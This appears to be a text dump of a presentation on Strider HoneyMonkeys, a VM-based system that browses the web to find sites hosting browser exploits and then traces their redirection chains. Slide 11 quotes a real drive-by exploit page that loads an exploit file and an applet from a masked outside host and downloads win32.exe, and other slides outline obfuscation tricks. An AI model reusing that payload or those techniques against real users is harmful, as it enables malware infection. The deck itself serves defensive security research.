Title: Automated Web Patrol with Strider Honeymonkeys
1Automated Web Patrol With Strider Honeymonkeys
2A look at the Web -
3Why do we care about spam?
- Users want to
- - Look at quality pages on the web
- - Interact without the trouble of moderation
- - Surf safely
- Search engines want to -
- - Attract traffic
- - Provide good search results
- - Profit from ads
4Web Patrol
Need of the hour
Why automated web patrol ?
We implement automated web patrol system which
uses strider honeymonkey programs that run within
virtual machines.
1. Manual analyses are expensive. 2.
Automated Web Patrol aims to
significantly reduce the cost of
monitoring malicious Web sites 3. Can
capture those responsible for malicious
acts. 4. More efficient
5Strider Honeymonkeys
- A monkey program drives the
- browser in a way that mimics
- a human users operation.
- Dynamic and active way of
- detecting threats Honeymonkey.
- Assesses the harmful code injection strider
honeymonkey. - Logs and reports are generated after the alarm
is set off.
6HoneyMonkeys
Basic Functionalities
- 1. OSs of various patch levels
- Mimic human web browsing
- Uses StriderTracer to catch
- file creation and system configuration
changes - 3. Discover malicious
- web sites
OS 3
OS 2
OS 1
MALCODE
7BROWSER BASED VULNERABILITIES
Code Obfuscation
Deliberately adding Confusion
URL redirection
Re-directing the user to other sites
Vulnerability exploitation
Exploiting multiple browser vulnerabilities
Malware installation
Installing Viruses, worms Trojans
8Obfuscation
- Internet based activities that subvert web
technologies - Phishing (fraud)
- Traffic redirection
- Hosting of illegal sites
Eg. URL Obfuscation
http//www.usfca.edu_at_www.cse.scu.edu/tschwarz/coe
n252_03/index.html
URL rules interpret this as a userid.
Hide this portion of the URL.
9Obfuscation methods
- Dynamic code injection using document.write()
- (2) Long strings with encoded characters are
decoded by unescape() function - (3) Custom decoding routine included in a script
- (4) Sub string is replaced using replace()
function. Obfuscation limits the ability of
detectors to detect attacks that leverage exploit
code.
10URL Redirection
- Primary URL Secondary URL
- Protocol redirection using HTTP 302 temporary
redirect - HTML Tags
- Script functions including window.location.repl
ace().
http//IP address / 8 chars/ test2/ iejp.htm
http//IP address
PRIMARY
SECONDARY
USER
11Vulnerability Exploitation
Example of vulnerability
Exploit 1
lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/spl
oit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt Try document.write(
'ltobject data1091154510511611558
109104116109108581021051081015
8// C\fo''o.mht!''http//vxxxx''xxe.biz//adv
''erts//033//targ.ch''m/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgtlt/bodygtlt/htmlgt
Exploit 2
Exploit 3
12Malware Installation
- Viruses
- Backdoor functions
- Bot programs
- Trojan downloaders
- Trojan droppers
- Trojan proxies
-
- Spyware programs
13HoneyMonkey Stage 1
Honeymonkey System
- Visit n URLs simultaneously
- If exploit detected, re-visit each one
individually until exploit URL is found
VM U1 U2 U3 U4 U5
U6
VM U1 U2
14HoneyMonkey Stage 2
Honeymonkey System
- Re-scan exploit URLs
- Perform recursive redirection analysis
- Identify all web pages involved
-
VM U2 U3 U2
U3
VM U2 U3 U9
U10
15HoneyMonkey Stage 3
Honeymonkey System
- Re-scan exploit URLs
- Scan using fully patched VMs
- Identify attacks exploiting the latest
vulnerabilities -
VM U2 U3 U9
U10
VM U2 U9
16FLOWCHART / REPORT
- Scan up to 500-700 URLs per day
17Input URL Lists
Output URL Data
- Exploit URLs
- Measures risk of visiting
similar web sites. - Topology Graphs
- Several URLs shut down provide leads for
anti-spyware research. - Zero-day exploits
- Monitors URL upgrades.
- Suspicious URLs
- Known to host spyware or malware.
- Links appearing in phishing or spam messages.
- Most popular web sites
- Top 100,000 by browser traffic ranking.
- Local URLs
- Organization want to verify web pages have not
been compromised.
18EXPERIMENTAL RESULTS
- Collected 16,000 URLs
- Web search of known-bad web sites
- Web search for Windows hosts files
- Depth-2 crawling of previous URLs
- 207/16,190 1.28 of web sites
- All tests done using IEv6
19TOPOLOGY GRAPHS / NODE RANKING
- 17 exploit URLs for SP2-PP
- Most powerful exploit pages
20SITE RANKING
- Based on connection counts -
- Based on number of exploit-URLs hosted -
21Effective Monitoring
- Exploit URLs
- Useful for detecting zero day exploits
- Content providers with
- well-known URLs must maintain these URLs to
keep high traffic - Highly ranked URLs
- More likely to upgrade exploits
Scanning popular URLs
22- HoneyMonkey will detect most
- Trojan viruses
- Backdoor functions
- Spyware programs
- Uniform detection of exploits
- Known vulnerability attack
- Zero-day exploits
- Generates XML report for each visit
- Takes time to clean infected machine after each
site visit. - Obfuscation escapes anti-virus S/W
- HM waits only 2 mins /URL
- -Delay exploit on pages
- Attacks may be randomized, confusing the HMs
- HM can be detected by sending dialog box.
23Scope for Improvements
- Run HoneyMonkey with random wait times
- Combat delayed exploits on sites.
- Randomize HoneyMonkey attack
- Vulnerability-specific exploit detector
- Insert break points within
- bad code.
- Stops execution before
- potentially malicious code.
- They need to work on accuracy
- They need more classification
- according to contents
- They should improve on avoiding
- detection by the honey monkeys
24Thank You
Any Questions